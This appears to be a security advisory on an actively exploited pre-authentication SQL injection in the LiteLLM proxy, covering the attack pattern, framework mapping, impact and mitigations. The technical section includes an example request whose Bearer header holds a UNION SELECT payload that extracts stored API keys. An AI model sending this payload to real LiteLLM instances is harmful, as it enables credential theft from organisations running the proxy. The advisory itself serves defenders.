Overview
A critical unauthenticated SQL injection vulnerability tracked as CVE-2026-42208 in the popular LiteLLM open-source LLM gateway is under active exploitation. Threat actors are leveraging the flaw to extract sensitive credentials — including API keys for OpenAI, Anthropic, and AWS Bedrock — directly from the proxy’s backend database. Exploitation was confirmed by Sysdig researchers approximately 36 hours after public disclosure on April 24, 2026, underscoring the speed at which AI infrastructure vulnerabilities are now weaponised.
LiteLLM is a widely adopted proxy and SDK layer that provides a unified API interface for calling multiple LLM providers. With 45,000 GitHub stars and 7,600 forks, its compromise represents a significant supply-chain risk across the LLM application ecosystem.
Technical Analysis
The vulnerability exists in LiteLLM’s proxy API key verification logic, where string concatenation was used to construct SQL queries rather than parameterised inputs. An attacker can craft a malicious Authorization: Bearer header and send it to any LLM API route — such as /chat/completions — without requiring prior authentication.
POST /chat/completions HTTP/1.1
Host: <litellm-host>
Authorization: Bearer ' UNION SELECT api_key, key_alias, spend FROM litellm_verificationtoken--
Content-Type: application/json
Sysdig’s analysis of observed exploitation revealed a two-phase attack pattern:
- Reconnaissance phase: Attackers probed the database schema, querying specific tables storing API keys, provider credentials, environment variables, and configuration secrets. Crucially, no benign tables were queried — indicating prior knowledge of LiteLLM’s data model.
- Precision phase: Attackers rotated IP addresses for evasion, then reissued targeted queries against confirmed table names, reducing noise and improving extraction efficiency.
A fix was delivered in LiteLLM v1.83.7 by replacing string concatenation with parameterised queries throughout the affected verification flow.
Framework Mapping
- AML.T0040 (ML Model Inference API Access): Stolen provider credentials grant direct, unauthenticated access to underlying LLM inference APIs.
- AML.T0012 (Valid Accounts): Harvested API keys and master keys allow attackers to impersonate legitimate users against AI providers.
- AML.T0057 (LLM Data Leakage): Sensitive configuration data and secrets are directly exfiltrated from the proxy database.
- LLM06 (Sensitive Information Disclosure): The vulnerability directly exposes stored secrets, provider tokens, and environment configurations.
- LLM05 (Supply Chain Vulnerabilities): LiteLLM’s position as a middleware layer means compromise cascades across all connected AI services.
Impact Assessment
Organisations running unpatched, self-hosted LiteLLM instances face immediate credential exposure. Stolen API keys can be used to:
- Exhaust billing quotas on provider accounts (OpenAI, Anthropic, AWS Bedrock)
- Access proprietary prompts and pipeline configurations
- Pivot into connected infrastructure using environment secrets
The attack surface is broad: LiteLLM is embedded in numerous LLM application stacks, MLOps platforms, and enterprise AI gateways. The concurrent supply-chain attack via malicious PyPI packages compounds overall risk for the LiteLLM ecosystem.
Mitigation & Recommendations
- Upgrade immediately to LiteLLM v1.83.7 or later — this is the only complete remediation.
- Rotate all credentials stored in the LiteLLM database: API keys, virtual keys, master keys, and any provider tokens (OpenAI, Anthropic, Bedrock).
- Audit logs for POST requests to
/chat/completionsor other API routes with anomalousAuthorizationheaders, particularly those containing SQL metacharacters. - Restrict network exposure of LiteLLM proxy instances; place behind authenticated reverse proxies where possible.
- Review PyPI dependencies for LiteLLM-adjacent packages given the concurrent supply-chain campaign.
References
- BleepingComputer: Hackers are exploiting a critical LiteLLM pre-auth SQLi flaw
- LiteLLM Security Advisory: CVE-2026-42208
- Sysdig Threat Research Report (April 2026)